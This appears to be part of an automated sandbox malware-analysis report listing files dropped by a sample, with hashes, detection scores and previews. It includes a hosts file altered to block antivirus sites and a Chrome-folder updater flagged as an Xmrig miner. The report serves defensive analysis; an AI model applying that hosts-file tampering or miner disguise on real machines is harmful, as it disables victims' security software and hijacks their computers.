                                                                                                                                                            SHA-512:5F1A9C993CD5394E23B39C43CC7479355C922D1EE8EA48109BBAD805209DEE697E20759257ECA9E2F1B75D34A8C4B4C428A736FA8A468DC18DE6C44CB6394846
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............v...v...v.w....v......v......v......v.....v...w.;.v......v......v......v.Rich..v.................PE..L....z.b......................9...................@...........................<......C......................................X.........;.............................................................@L..@...............D............................text............................... ..`.data.....8......L..................@....rsrc.........;......*..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):270848
                                                                                                                                                            Entropy (8bit):6.491820168131084
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:MkULcl5ZxKJo8LwzbXyTi4UDcVpdLdKHJPOCv09I3i+9P7HbMsoOz1:LUa5p/bXyTi4iGTdAJ7pf0sv
                                                                                                                                                            MD5:DCBD05276D11111F2DD2A7EDF52E3386
                                                                                                                                                            SHA1:F5DC6D418D9FB2D2CFA4AF440EC4FF78DA8F11EC
                                                                                                                                                            SHA-256:CEA5245BAB036B03F89D549C71F47DF8A14854B0DE515643BF95319EC5AF71D4
                                                                                                                                                            SHA-512:5F1A9C993CD5394E23B39C43CC7479355C922D1EE8EA48109BBAD805209DEE697E20759257ECA9E2F1B75D34A8C4B4C428A736FA8A468DC18DE6C44CB6394846
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............v...v...v.w....v......v......v......v.....v...w.;.v......v......v......v.Rich..v.................PE..L....z.b......................9...................@...........................<......C......................................X.........;.............................................................@L..@...............D............................text............................... ..`.data.....8......L..................@....rsrc.........;......*..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, LF line terminators
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):6553600
                                                                                                                                                            Entropy (8bit):5.255566419997682
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24576:KV5tI95VcEDi0v3lchlh6lRdKNhFk15N:KV5tI95Vr3lchlh6lRdKNhFk15N
                                                                                                                                                            MD5:6678E27338C07E7517BF9BAF7B45701A
                                                                                                                                                            SHA1:F5E53F263B1591147D8EC81CF895D809FB3C4EE8
                                                                                                                                                            SHA-256:FE93B88D92FAB054DBACEFC6B90633BB49F90FD012761349A99D166199372C45
                                                                                                                                                            SHA-512:1E9D24EC644BCE6438A513D47E6E218C6C19DE319FF0F70CDF38CF294DD189A0211D8CA110421D378FC4083164C091FCEA6DDD9DC004201B8B35C32509C70B40
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.2023-10-03 09:57:33, Info CBS Starting TiWorker initialization...2023-10-03 09:57:33, Info CBS Lock: New lock added: TiWorkerClassFactory, level: 30, total lock:2..2023-10-03 09:57:33, Info CBS Ending TiWorker initialization...2023-10-03 09:57:33, Info CBS Starting the TiWorker main loop...2023-10-03 09:57:33, Info CBS TiWorker starts successfully...2023-10-03 09:57:33, Info CBS Lock: New lock added: CCbsWorker, level: 5, total lock:3..2023-10-03 09:57:33, Info CBS Universal Time is: 2023-10-03 08:57:33.888..2023-10-03 09:57:33, Info CBS Loaded Servicing Stack v10.0.19041.1940 with Core: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1940_none_7dd80d767cb5c7b0\cbscore.dll..2023-10-03 09:57:33, Info CBS Build: 19041.1.amd64fre.vb_release.191206-1406..2023-10-03 09:57:33
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2224
                                                                                                                                                            Entropy (8bit):5.354902188542171
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:CWSU4y4RFymFoUeW+gZ9tK8NPdMs7u1iMuge//MaOUyu0lhV:CLHyIFvKLgZ2KlDOugQ01
                                                                                                                                                            MD5:F13A8AE7B44AED9EC883230BE2CAEEBF
                                                                                                                                                            SHA1:AF46C488E496FF2C8B0FC9A872176C6E62C21E11
                                                                                                                                                            SHA-256:B8C593406BB32D1B91CBCBA7266C8F68EF24BE57F48F320F96A45D715DB54D62
                                                                                                                                                            SHA-512:EFAA6424D0AED672CC7D673FBDBEF7B6FC12A312E01A65742879F0709ABE9A51CECB4A60166EFA97898242644437E6B09AABF4006B0793ED31FEB62ECFF70F12
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:@...e...........................................................P................1]...E.....m.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):64
                                                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:@...e...........................................................
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\latestX.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2748
                                                                                                                                                            Entropy (8bit):4.269302338623222
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:vDZhyoZWM9rU5fFcDL6iCW1RiJ9rn5w0K:vDZEurK9XiCW1RiXn54
                                                                                                                                                            MD5:7B1D6A1E1228728A16B66C3714AA9A23
                                                                                                                                                            SHA1:8B59677A3560777593B1FA7D67465BBD7B3BC548
                                                                                                                                                            SHA-256:3F15965D0159A818849134B3FBB016E858AC50EFDF67BFCD762606AC51831BC5
                                                                                                                                                            SHA-512:573B68C9865416EA2F9CF5C614FCEDBFE69C67BD572BACEC81C1756E711BD90FCFEE93E17B74FB294756ADF67AD18845A56C87F7F870940CBAEB3A579146A3B6
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\updater.exe
                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5536256
                                                                                                                                                            Entropy (8bit):6.689058470432344
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
                                                                                                                                                            MD5:8FA2F1BA9B9A7EA2B3C4DD627C627CEC
                                                                                                                                                            SHA1:358E3800286E5D4C5662366AD7311BC5A51BA497
                                                                                                                                                            SHA-256:78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
                                                                                                                                                            SHA-512:74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
                                                                                                                                                            Malicious:true
                                                                                                                                                            Yara Hits:
                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\whxcdqscjswq.tmp, Author: Joe Security
